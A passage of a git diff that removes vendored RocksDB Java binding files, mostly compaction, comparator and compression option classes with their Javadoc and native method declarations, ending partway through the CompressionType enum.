-   * <p>Note: we might use more memory than memtable_memory_budget during high
-   * write rate period</p>
-   *
-   * @param memtableMemoryBudget memory budget in bytes
-   * @return the instance of the current object.
-   */
-  T optimizeUniversalStyleCompaction(
-      long memtableMemoryBudget);
-
-  /**
-   * Set {@link BuiltinComparator} to be used with RocksDB.
-   *
-   * Note: Comparator can be set once upon database creation.
-   *
-   * Default: BytewiseComparator.
-   * @param builtinComparator a {@link BuiltinComparator} type.
-   * @return the instance of the current object.
-   */
-  T setComparator(
-      BuiltinComparator builtinComparator);
-
-  /**
-   * Use the specified comparator for key ordering.
-   *
-   * Comparator should not be disposed before options instances using this comparator is
-   * disposed. If dispose() function is not called, then comparator object will be
-   * GC'd automatically.
-   *
-   * Comparator instance can be re-used in multiple options instances.
-   *
-   * @param comparator java instance.
-   * @return the instance of the current object.
-   */
-  T setComparator(
-      AbstractComparator<? extends AbstractSlice<?>> comparator);
-
-  /**
-   * <p>Set the merge operator to be used for merging two merge operands
-   * of the same key. The merge function is invoked during
-   * compaction and at lookup time, if multiple key/value pairs belonging
-   * to the same key are found in the database.</p>
-   *
-   * @param name the name of the merge function, as defined by
-   * the MergeOperators factory (see utilities/MergeOperators.h)
-   * The merge function is specified by name and must be one of the
-   * standard merge operators provided by RocksDB. The available
-   * operators are "put", "uint64add", "stringappend" and "stringappendtest".
-   * @return the instance of the current object.
-   */
-  T setMergeOperatorName(String name);
-
-  /**
-   * <p>Set the merge operator to be used for merging two different key/value
-   * pairs that share the same key. The merge function is invoked during
-   * compaction and at lookup time, if multiple key/value pairs belonging
-   * to the same key are found in the database.</p>
-   *
-   * @param mergeOperator {@link MergeOperator} instance.
-   * @return the instance of the current object.
-   */
-  T setMergeOperator(MergeOperator mergeOperator);
-
-  /**
-   * This prefix-extractor uses the first n bytes of a key as its prefix.
-   *
-   * In some hash-based memtable representation such as HashLinkedList
-   * and HashSkipList, prefixes are used to partition the keys into
-   * several buckets.  Prefix extractor is used to specify how to
-   * extract the prefix given a key.
-   *
-   * @param n use the first n bytes of a key as its prefix.
-   * @return the reference to the current option.
-   */
-  T useFixedLengthPrefixExtractor(int n);
-
-  /**
-   * Same as fixed length prefix extractor, except that when slice is
-   * shorter than the fixed length, it will use the full key.
-   *
-   * @param n use the first n bytes of a key as its prefix.
-   * @return the reference to the current option.
-   */
-  T useCappedPrefixExtractor(int n);
-
-  /**
-   * Number of files to trigger level-0 compaction. A value &lt; 0 means that
-   * level-0 compaction will not be triggered by number of files at all.
-   * Default: 4
-   *
-   * @param numFiles the number of files in level-0 to trigger compaction.
-   * @return the reference to the current option.
-   */
-  T setLevelZeroFileNumCompactionTrigger(
-      int numFiles);
-
-  /**
-   * The number of files in level 0 to trigger compaction from level-0 to
-   * level-1.  A value &lt; 0 means that level-0 compaction will not be
-   * triggered by number of files at all.
-   * Default: 4
-   *
-   * @return the number of files in level 0 to trigger compaction.
-   */
-  int levelZeroFileNumCompactionTrigger();
-
-  /**
-   * Soft limit on number of level-0 files. We start slowing down writes at this
-   * point. A value &lt; 0 means that no writing slow down will be triggered by
-   * number of files in level-0.
-   *
-   * @param numFiles soft limit on number of level-0 files.
-   * @return the reference to the current option.
-   */
-  T setLevelZeroSlowdownWritesTrigger(
-      int numFiles);
-
-  /**
-   * Soft limit on the number of level-0 files. We start slowing down writes
-   * at this point. A value &lt; 0 means that no writing slow down will be
-   * triggered by number of files in level-0.
-   *
-   * @return the soft limit on the number of level-0 files.
-   */
-  int levelZeroSlowdownWritesTrigger();
-
-  /**
-   * Maximum number of level-0 files.  We stop writes at this point.
-   *
-   * @param numFiles the hard limit of the number of level-0 files.
-   * @return the reference to the current option.
-   */
-  T setLevelZeroStopWritesTrigger(int numFiles);
-
-  /**
-   * Maximum number of level-0 files.  We stop writes at this point.
-   *
-   * @return the hard limit of the number of level-0 file.
-   */
-  int levelZeroStopWritesTrigger();
-
-  /**
-   * The ratio between the total size of level-(L+1) files and the total
-   * size of level-L files for all L.
-   * DEFAULT: 10
-   *
-   * @param multiplier the ratio between the total size of level-(L+1)
-   *     files and the total size of level-L files for all L.
-   * @return the reference to the current option.
-   */
-  T setMaxBytesForLevelMultiplier(
-      double multiplier);
-
-  /**
-   * The ratio between the total size of level-(L+1) files and the total
-   * size of level-L files for all L.
-   * DEFAULT: 10
-   *
-   * @return the ratio between the total size of level-(L+1) files and
-   *     the total size of level-L files for all L.
-   */
-  double maxBytesForLevelMultiplier();
-
-  /**
-   * FIFO compaction option.
-   * The oldest table file will be deleted
-   * once the sum of table files reaches this size.
-   * The default value is 1GB (1 * 1024 * 1024 * 1024).
-   *
-   * @param maxTableFilesSize the size limit of the total sum of table files.
-   * @return the instance of the current object.
-   */
-  T setMaxTableFilesSizeFIFO(
-      long maxTableFilesSize);
-
-  /**
-   * FIFO compaction option.
-   * The oldest table file will be deleted
-   * once the sum of table files reaches this size.
-   * The default value is 1GB (1 * 1024 * 1024 * 1024).
-   *
-   * @return the size limit of the total sum of table files.
-   */
-  long maxTableFilesSizeFIFO();
-
-  /**
-   * Get the config for mem-table.
-   *
-   * @return the mem-table config.
-   */
-  MemTableConfig memTableConfig();
-
-  /**
-   * Set the config for mem-table.
-   *
-   * @param memTableConfig the mem-table config.
-   * @return the instance of the current object.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *   while overflowing the underlying platform specific value.
-   */
-  T setMemTableConfig(MemTableConfig memTableConfig);
-
-  /**
-   * Returns the name of the current mem table representation.
-   * Memtable format can be set using setTableFormatConfig.
-   *
-   * @return the name of the currently-used memtable factory.
-   * @see #setTableFormatConfig(org.rocksdb.TableFormatConfig)
-   */
-  String memTableFactoryName();
-
-  /**
-   * Get the config for table format.
-   *
-   * @return the table format config.
-   */
-  TableFormatConfig tableFormatConfig();
-
-  /**
-   * Set the config for table format.
-   *
-   * @param config the table format config.
-   * @return the reference of the current options.
-   */
-  T setTableFormatConfig(TableFormatConfig config);
-
-  /**
-   * @return the name of the currently used table factory.
-   */
-  String tableFactoryName();
-
-  /**
-   * Compression algorithm that will be used for the bottommost level that
-   * contain files. If level-compaction is used, this option will only affect
-   * levels after base level.
-   *
-   * Default: {@link CompressionType#DISABLE_COMPRESSION_OPTION}
-   *
-   * @param bottommostCompressionType  The compression type to use for the
-   *     bottommost level
-   *
-   * @return the reference of the current options.
-   */
-  T setBottommostCompressionType(
-      final CompressionType bottommostCompressionType);
-
-  /**
-   * Compression algorithm that will be used for the bottommost level that
-   * contain files. If level-compaction is used, this option will only affect
-   * levels after base level.
-   *
-   * Default: {@link CompressionType#DISABLE_COMPRESSION_OPTION}
-   *
-   * @return The compression type used for the bottommost level
-   */
-  CompressionType bottommostCompressionType();
-
-
-  /**
-   * Set the different options for compression algorithms
-   *
-   * @param compressionOptions The compression options
-   *
-   * @return the reference of the current options.
-   */
-  T setCompressionOptions(
-      CompressionOptions compressionOptions);
-
-  /**
-   * Get the different options for compression algorithms
-   *
-   * @return The compression options
-   */
-  CompressionOptions compressionOptions();
-
-  /**
-   * Default memtable memory budget used with the following methods:
-   *
-   * <ol>
-   *   <li>{@link #optimizeLevelStyleCompaction()}</li>
-   *   <li>{@link #optimizeUniversalStyleCompaction()}</li>
-   * </ol>
-   */
-  long DEFAULT_COMPACTION_MEMTABLE_MEMORY_BUDGET = 512 * 1024 * 1024;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionOptionsFIFO.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionOptionsFIFO.java
deleted file mode 100644
index f795807..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionOptionsFIFO.java
+++ /dev/null
@@ -1,50 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Options for FIFO Compaction
- */
-public class CompactionOptionsFIFO extends RocksObject {
-
-  public CompactionOptionsFIFO() {
-    super(newCompactionOptionsFIFO());
-  }
-
-  /**
-   * Once the total sum of table files reaches this, we will delete the oldest
-   * table file
-   *
-   * Default: 1GB
-   *
-   * @param maxTableFilesSize The maximum size of the table files
-   *
-   * @return the reference to the current options.
-   */
-  public CompactionOptionsFIFO setMaxTableFilesSize(
-      final long maxTableFilesSize) {
-    setMaxTableFilesSize(nativeHandle_, maxTableFilesSize);
-    return this;
-  }
-
-  /**
-   * Once the total sum of table files reaches this, we will delete the oldest
-   * table file
-   *
-   * Default: 1GB
-   *
-   * @return max table file size in bytes
-   */
-  public long maxTableFilesSize() {
-    return maxTableFilesSize(nativeHandle_);
-  }
-
-  private native void setMaxTableFilesSize(long handle, long maxTableFilesSize);
-  private native long maxTableFilesSize(long handle);
-
-  private native static long newCompactionOptionsFIFO();
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionOptionsUniversal.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionOptionsUniversal.java
deleted file mode 100644
index d2dfa4e..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionOptionsUniversal.java
+++ /dev/null
@@ -1,273 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Options for Universal Compaction
- */
-public class CompactionOptionsUniversal extends RocksObject {
-
-  public CompactionOptionsUniversal() {
-    super(newCompactionOptionsUniversal());
-  }
-
-  /**
-   * Percentage flexibility while comparing file size. If the candidate file(s)
-   * size is 1% smaller than the next file's size, then include next file into
-   * this candidate set.
-   *
-   * Default: 1
-   *
-   * @param sizeRatio The size ratio to use
-   *
-   * @return the reference to the current options.
-   */
-  public CompactionOptionsUniversal setSizeRatio(final int sizeRatio) {
-    setSizeRatio(nativeHandle_, sizeRatio);
-    return this;
-  }
-
-  /**
-   * Percentage flexibility while comparing file size. If the candidate file(s)
-   * size is 1% smaller than the next file's size, then include next file into
-   * this candidate set.
-   *
-   * Default: 1
-   *
-   * @return The size ratio in use
-   */
-  public int sizeRatio() {
-    return sizeRatio(nativeHandle_);
-  }
-
-  /**
-   * The minimum number of files in a single compaction run.
-   *
-   * Default: 2
-   *
-   * @param minMergeWidth minimum number of files in a single compaction run
-   *
-   * @return the reference to the current options.
-   */
-  public CompactionOptionsUniversal setMinMergeWidth(final int minMergeWidth) {
-    setMinMergeWidth(nativeHandle_, minMergeWidth);
-    return this;
-  }
-
-  /**
-   * The minimum number of files in a single compaction run.
-   *
-   * Default: 2
-   *
-   * @return minimum number of files in a single compaction run
-   */
-  public int minMergeWidth() {
-    return minMergeWidth(nativeHandle_);
-  }
-
-  /**
-   * The maximum number of files in a single compaction run.
-   *
-   * Default: {@link Long#MAX_VALUE}
-   *
-   * @param maxMergeWidth maximum number of files in a single compaction run
-   *
-   * @return the reference to the current options.
-   */
-  public CompactionOptionsUniversal setMaxMergeWidth(final int maxMergeWidth) {
-    setMaxMergeWidth(nativeHandle_, maxMergeWidth);
-    return this;
-  }
-
-  /**
-   * The maximum number of files in a single compaction run.
-   *
-   * Default: {@link Long#MAX_VALUE}
-   *
-   * @return maximum number of files in a single compaction run
-   */
-  public int maxMergeWidth() {
-    return maxMergeWidth(nativeHandle_);
-  }
-
-  /**
-   * The size amplification is defined as the amount (in percentage) of
-   * additional storage needed to store a single byte of data in the database.
-   * For example, a size amplification of 2% means that a database that
-   * contains 100 bytes of user-data may occupy upto 102 bytes of
-   * physical storage. By this definition, a fully compacted database has
-   * a size amplification of 0%. Rocksdb uses the following heuristic
-   * to calculate size amplification: it assumes that all files excluding
-   * the earliest file contribute to the size amplification.
-   *
-   * Default: 200, which means that a 100 byte database could require upto
-   * 300 bytes of storage.
-   *
-   * @param maxSizeAmplificationPercent the amount of additional storage needed
-   *     (as a percentage) to store a single byte in the database
-   *
-   * @return the reference to the current options.
-   */
-  public CompactionOptionsUniversal setMaxSizeAmplificationPercent(
-      final int maxSizeAmplificationPercent) {
-    setMaxSizeAmplificationPercent(nativeHandle_, maxSizeAmplificationPercent);
-    return this;
-  }
-
-  /**
-   * The size amplification is defined as the amount (in percentage) of
-   * additional storage needed to store a single byte of data in the database.
-   * For example, a size amplification of 2% means that a database that
-   * contains 100 bytes of user-data may occupy upto 102 bytes of
-   * physical storage. By this definition, a fully compacted database has
-   * a size amplification of 0%. Rocksdb uses the following heuristic
-   * to calculate size amplification: it assumes that all files excluding
-   * the earliest file contribute to the size amplification.
-   *
-   * Default: 200, which means that a 100 byte database could require upto
-   * 300 bytes of storage.
-   *
-   * @return the amount of additional storage needed (as a percentage) to store
-   *     a single byte in the database
-   */
-  public int maxSizeAmplificationPercent() {
-    return maxSizeAmplificationPercent(nativeHandle_);
-  }
-
-  /**
-   * If this option is set to be -1 (the default value), all the output files
-   * will follow compression type specified.
-   *
-   * If this option is not negative, we will try to make sure compressed
-   * size is just above this value. In normal cases, at least this percentage
-   * of data will be compressed.
-   *
-   * When we are compacting to a new file, here is the criteria whether
-   * it needs to be compressed: assuming here are the list of files sorted
-   * by generation time:
-   *    A1...An B1...Bm C1...Ct
-   * where A1 is the newest and Ct is the oldest, and we are going to compact
-   * B1...Bm, we calculate the total size of all the files as total_size, as
-   * well as  the total size of C1...Ct as total_C, the compaction output file
-   * will be compressed iff
-   *    total_C / total_size &lt; this percentage
-   *
-   * Default: -1
-   *
-   * @param compressionSizePercent percentage of size for compression
-   *
-   * @return the reference to the current options.
-   */
-  public CompactionOptionsUniversal setCompressionSizePercent(
-      final int compressionSizePercent) {
-    setCompressionSizePercent(nativeHandle_, compressionSizePercent);
-    return this;
-  }
-
-  /**
-   * If this option is set to be -1 (the default value), all the output files
-   * will follow compression type specified.
-   *
-   * If this option is not negative, we will try to make sure compressed
-   * size is just above this value. In normal cases, at least this percentage
-   * of data will be compressed.
-   *
-   * When we are compacting to a new file, here is the criteria whether
-   * it needs to be compressed: assuming here are the list of files sorted
-   * by generation time:
-   *    A1...An B1...Bm C1...Ct
-   * where A1 is the newest and Ct is the oldest, and we are going to compact
-   * B1...Bm, we calculate the total size of all the files as total_size, as
-   * well as  the total size of C1...Ct as total_C, the compaction output file
-   * will be compressed iff
-   *    total_C / total_size &lt; this percentage
-   *
-   * Default: -1
-   *
-   * @return percentage of size for compression
-   */
-  public int compressionSizePercent() {
-    return compressionSizePercent(nativeHandle_);
-  }
-
-  /**
-   * The algorithm used to stop picking files into a single compaction run
-   *
-   * Default: {@link CompactionStopStyle#CompactionStopStyleTotalSize}
-   *
-   * @param compactionStopStyle The compaction algorithm
-   *
-   * @return the reference to the current options.
-   */
-  public CompactionOptionsUniversal setStopStyle(
-      final CompactionStopStyle compactionStopStyle) {
-    setStopStyle(nativeHandle_, compactionStopStyle.getValue());
-    return this;
-  }
-
-  /**
-   * The algorithm used to stop picking files into a single compaction run
-   *
-   * Default: {@link CompactionStopStyle#CompactionStopStyleTotalSize}
-   *
-   * @return The compaction algorithm
-   */
-  public CompactionStopStyle stopStyle() {
-    return CompactionStopStyle.getCompactionStopStyle(stopStyle(nativeHandle_));
-  }
-
-  /**
-   * Option to optimize the universal multi level compaction by enabling
-   * trivial move for non overlapping files.
-   *
-   * Default: false
-   *
-   * @param allowTrivialMove true if trivial move is allowed
-   *
-   * @return the reference to the current options.
-   */
-  public CompactionOptionsUniversal setAllowTrivialMove(
-      final boolean allowTrivialMove) {
-    setAllowTrivialMove(nativeHandle_, allowTrivialMove);
-    return this;
-  }
-
-  /**
-   * Option to optimize the universal multi level compaction by enabling
-   * trivial move for non overlapping files.
-   *
-   * Default: false
-   *
-   * @return true if trivial move is allowed
-   */
-  public boolean allowTrivialMove() {
-    return allowTrivialMove(nativeHandle_);
-  }
-
-  private native static long newCompactionOptionsUniversal();
-  @Override protected final native void disposeInternal(final long handle);
-
-  private native void setSizeRatio(final long handle, final int sizeRatio);
-  private native int sizeRatio(final long handle);
-  private native void setMinMergeWidth(
-      final long handle, final int minMergeWidth);
-  private native int minMergeWidth(final long handle);
-  private native void setMaxMergeWidth(
-      final long handle, final int maxMergeWidth);
-  private native int maxMergeWidth(final long handle);
-  private native void setMaxSizeAmplificationPercent(
-      final long handle, final int maxSizeAmplificationPercent);
-  private native int maxSizeAmplificationPercent(final long handle);
-  private native void setCompressionSizePercent(
-      final long handle, final int compressionSizePercent);
-  private native int compressionSizePercent(final long handle);
-  private native void setStopStyle(
-      final long handle, final byte stopStyle);
-  private native byte stopStyle(final long handle);
-  private native void setAllowTrivialMove(
-      final long handle, final boolean allowTrivialMove);
-  private native boolean allowTrivialMove(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionPriority.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionPriority.java
deleted file mode 100644
index a4f53cd..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionPriority.java
+++ /dev/null
@@ -1,73 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Compaction Priorities
- */
-public enum CompactionPriority {
-
-  /**
-   * Slightly Prioritize larger files by size compensated by #deletes
-   */
-  ByCompensatedSize((byte)0x0),
-
-  /**
-   * First compact files whose data's latest update time is oldest.
-   * Try this if you only update some hot keys in small ranges.
-   */
-  OldestLargestSeqFirst((byte)0x1),
-
-  /**
-   * First compact files whose range hasn't been compacted to the next level
-   * for the longest. If your updates are random across the key space,
-   * write amplification is slightly better with this option.
-   */
-  OldestSmallestSeqFirst((byte)0x2),
-
-  /**
-   * First compact files whose ratio between overlapping size in next level
-   * and its size is the smallest. It in many cases can optimize write
-   * amplification.
-   */
-  MinOverlappingRatio((byte)0x3);
-
-
-  private final byte value;
-
-  CompactionPriority(final byte value) {
-    this.value = value;
-  }
-
-  /**
-   * Returns the byte value of the enumerations value
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value;
-  }
-
-  /**
-   * Get CompactionPriority by byte value.
-   *
-   * @param value byte representation of CompactionPriority.
-   *
-   * @return {@link org.rocksdb.CompactionPriority} instance or null.
-   * @throws java.lang.IllegalArgumentException if an invalid
-   *     value is provided.
-   */
-  public static CompactionPriority getCompactionPriority(final byte value) {
-    for (final CompactionPriority compactionPriority :
-        CompactionPriority.values()) {
-      if (compactionPriority.getValue() == value){
-        return compactionPriority;
-      }
-    }
-    throw new IllegalArgumentException(
-        "Illegal value provided for CompactionPriority.");
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionStopStyle.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionStopStyle.java
deleted file mode 100644
index 13cc873..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionStopStyle.java
+++ /dev/null
@@ -1,54 +0,0 @@
-package org.rocksdb;
-
-/**
- * Algorithm used to make a compaction request stop picking new files
- * into a single compaction run
- */
-public enum CompactionStopStyle {
-
-  /**
-   * Pick files of similar size
-   */
-  CompactionStopStyleSimilarSize((byte)0x0),
-
-  /**
-   * Total size of picked files &gt; next file
-   */
-  CompactionStopStyleTotalSize((byte)0x1);
-
-
-  private final byte value;
-
-  CompactionStopStyle(final byte value) {
-    this.value = value;
-  }
-
-  /**
-   * Returns the byte value of the enumerations value
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value;
-  }
-
-  /**
-   * Get CompactionStopStyle by byte value.
-   *
-   * @param value byte representation of CompactionStopStyle.
-   *
-   * @return {@link org.rocksdb.CompactionStopStyle} instance or null.
-   * @throws java.lang.IllegalArgumentException if an invalid
-   *     value is provided.
-   */
-  public static CompactionStopStyle getCompactionStopStyle(final byte value) {
-    for (final CompactionStopStyle compactionStopStyle :
-        CompactionStopStyle.values()) {
-      if (compactionStopStyle.getValue() == value){
-        return compactionStopStyle;
-      }
-    }
-    throw new IllegalArgumentException(
-        "Illegal value provided for CompactionStopStyle.");
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionStyle.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionStyle.java
deleted file mode 100644
index 5e13363..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompactionStyle.java
+++ /dev/null
@@ -1,52 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Enum CompactionStyle
- *
- * RocksDB supports different styles of compaction. Available
- * compaction styles can be chosen using this enumeration.
- *
- * <ol>
- *   <li><strong>LEVEL</strong> - Level based Compaction style</li>
- *   <li><strong>UNIVERSAL</strong> - Universal Compaction Style is a
- *   compaction style, targeting the use cases requiring lower write
- *   amplification, trading off read amplification and space
- *   amplification.</li>
- *   <li><strong>FIFO</strong> - FIFO compaction style is the simplest
- *   compaction strategy. It is suited for keeping event log data with
- *   very low overhead (query log for example). It periodically deletes
- *   the old data, so it's basically a TTL compaction style.</li>
- * </ol>
- *
- * @see <a
- * href="https://github.com/facebook/rocksdb/wiki/Universal-Compaction">
- * Universal Compaction</a>
- * @see <a
- * href="https://github.com/facebook/rocksdb/wiki/FIFO-compaction-style">
- * FIFO Compaction</a>
- */
-public enum CompactionStyle {
-  LEVEL((byte) 0),
-  UNIVERSAL((byte) 1),
-  FIFO((byte) 2);
-
-  private final byte value_;
-
-  private CompactionStyle(byte value) {
-    value_ = value;
-  }
-
-  /**
-   * Returns the byte value of the enumerations value
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value_;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Comparator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Comparator.java
deleted file mode 100644
index 817e00f..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Comparator.java
+++ /dev/null
@@ -1,32 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Base class for comparators which will receive
- * byte[] based access via org.rocksdb.Slice in their
- * compare method implementation.
- *
- * byte[] based slices perform better when small keys
- * are involved. When using larger keys consider
- * using @see org.rocksdb.DirectComparator
- */
-public abstract class Comparator extends AbstractComparator<Slice> {
-
-  private final long nativeHandle_;
-
-  public Comparator(final ComparatorOptions copt) {
-    super();
-    this.nativeHandle_ = createNewComparator0(copt.nativeHandle_);
-  }
-
-  @Override
-  protected final long getNativeHandle() {
-    return nativeHandle_;
-  }
-
-  private native long createNewComparator0(final long comparatorOptionsHandle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ComparatorOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ComparatorOptions.java
deleted file mode 100644
index 3a05bef..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ComparatorOptions.java
+++ /dev/null
@@ -1,51 +0,0 @@
-package org.rocksdb;
-
-/**
- * This class controls the behaviour
- * of Java implementations of
- * AbstractComparator
- *
- * Note that dispose() must be called before a ComparatorOptions
- * instance becomes out-of-scope to release the allocated memory in C++.
- */
-public class ComparatorOptions extends RocksObject {
-  public ComparatorOptions() {
-    super(newComparatorOptions());
-  }
-
-  /**
-   * Use adaptive mutex, which spins in the user space before resorting
-   * to kernel. This could reduce context switch when the mutex is not
-   * heavily contended. However, if the mutex is hot, we could end up
-   * wasting spin time.
-   * Default: false
-   *
-   * @return true if adaptive mutex is used.
-   */
-  public boolean useAdaptiveMutex() {
-    assert(isOwningHandle());
-    return useAdaptiveMutex(nativeHandle_);
-  }
-
-  /**
-   * Use adaptive mutex, which spins in the user space before resorting
-   * to kernel. This could reduce context switch when the mutex is not
-   * heavily contended. However, if the mutex is hot, we could end up
-   * wasting spin time.
-   * Default: false
-   *
-   * @param useAdaptiveMutex true if adaptive mutex is used.
-   * @return the reference to the current comparator options.
-   */
-  public ComparatorOptions setUseAdaptiveMutex(final boolean useAdaptiveMutex) {
-    assert (isOwningHandle());
-    setUseAdaptiveMutex(nativeHandle_, useAdaptiveMutex);
-    return this;
-  }
-
-  private native static long newComparatorOptions();
-  private native boolean useAdaptiveMutex(final long handle);
-  private native void setUseAdaptiveMutex(final long handle,
-      final boolean useAdaptiveMutex);
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompressionOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompressionOptions.java
deleted file mode 100644
index 4927770..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompressionOptions.java
+++ /dev/null
@@ -1,85 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Options for Compression
- */
-public class CompressionOptions extends RocksObject {
-
-  public CompressionOptions() {
-    super(newCompressionOptions());
-  }
-
-  public CompressionOptions setWindowBits(final int windowBits) {
-    setWindowBits(nativeHandle_, windowBits);
-    return this;
-  }
-
-  public int windowBits() {
-    return windowBits(nativeHandle_);
-  }
-
-  public CompressionOptions setLevel(final int level) {
-    setLevel(nativeHandle_, level);
-    return this;
-  }
-
-  public int level() {
-    return level(nativeHandle_);
-  }
-
-  public CompressionOptions setStrategy(final int strategy) {
-    setStrategy(nativeHandle_, strategy);
-    return this;
-  }
-
-  public int strategy() {
-    return strategy(nativeHandle_);
-  }
-
-  /**
-   * Maximum size of dictionary used to prime the compression library. Currently
-   * this dictionary will be constructed by sampling the first output file in a
-   * subcompaction when the target level is bottommost. This dictionary will be
-   * loaded into the compression library before compressing/uncompressing each
-   * data block of subsequent files in the subcompaction. Effectively, this
-   * improves compression ratios when there are repetitions across data blocks.
-   *
-   * A value of 0 indicates the feature is disabled.
-   *
-   * Default: 0.
-   *
-   * @param maxDictBytes Maximum bytes to use for the dictionary
-   *
-   * @return the reference to the current options
-   */
-  public CompressionOptions setMaxDictBytes(final int maxDictBytes) {
-    setMaxDictBytes(nativeHandle_, maxDictBytes);
-    return this;
-  }
-
-  /**
-   * Maximum size of dictionary used to prime the compression library.
-   *
-   * @return The maximum bytes to use for the dictionary
-   */
-  public int maxDictBytes() {
-    return maxDictBytes(nativeHandle_);
-  }
-
-  private native static long newCompressionOptions();
-  @Override protected final native void disposeInternal(final long handle);
-
-  private native void setWindowBits(final long handle, final int windowBits);
-  private native int windowBits(final long handle);
-  private native void setLevel(final long handle, final int level);
-  private native int level(final long handle);
-  private native void setStrategy(final long handle, final int strategy);
-  private native int strategy(final long handle);
-  private native void setMaxDictBytes(final long handle, final int maxDictBytes);
-  private native int maxDictBytes(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompressionType.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompressionType.java
deleted file mode 100644
index 2781537..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CompressionType.java
+++ /dev/null
@@ -1,99 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Enum CompressionType
- *
- * <p>DB contents are stored in a set of blocks, each of which holds a
- * sequence of key,value pairs. Each block may be compressed before
- * being stored in a file. The following enum describes which
- * compression method (if any) is used to compress a block.</p>
- */
-public enum CompressionType {
-
-  NO_COMPRESSION((byte) 0x0, null),
-  SNAPPY_COMPRESSION((byte) 0x1, "snappy"),
-  ZLIB_COMPRESSION((byte) 0x2, "z"),
-  BZLIB2_COMPRESSION((byte) 0x3, "bzip2"),
-  LZ4_COMPRESSION((byte) 0x4, "lz4"),
-  LZ4HC_COMPRESSION((byte) 0x5, "lz4hc"),
-  XPRESS_COMPRESSION((byte) 0x6, "xpress"),
-  ZSTD_COMPRESSION((byte)0x7, "zstd"),
-  DISABLE_COMPRESSION_OPTION((byte)0x7F, null);
-
-  /**
-   * <p>Get the CompressionType enumeration value by
-   * passing the library name to this method.</p>
-   *
-   * <p>If library cannot be found the enumeration
-   * value {@code NO_COMPRESSION} will be returned.</p>
-   *
-   * @param libraryName compression library name.
-   *
-   * @return CompressionType instance.
-   */
-  public static CompressionType getCompressionType(String libraryName) {
-    if (libraryName != null) {
-      for (CompressionType compressionType : CompressionType.values()) {
-        if (compressionType.getLibraryName() != null &&
-            compressionType.getLibraryName().equals(libraryName)) {
-          return compressionType;
-        }
-      }
-    }
-    return CompressionType.NO_COMPRESSION;
-  }
-
-  /**
-   * <p>Get the CompressionType enumeration value by
-   * passing the byte identifier to this method.</p>
-   *
-   * @param byteIdentifier of CompressionType.
-   *
-   * @return CompressionType instance.
-   *
-   * @throws IllegalArgumentException If CompressionType cannot be found for the
-   *   provided byteIdentifier
-   */
-  public static CompressionType getCompressionType(byte byteIdentifier) {
-    for (final CompressionType compressionType : CompressionType.values()) {
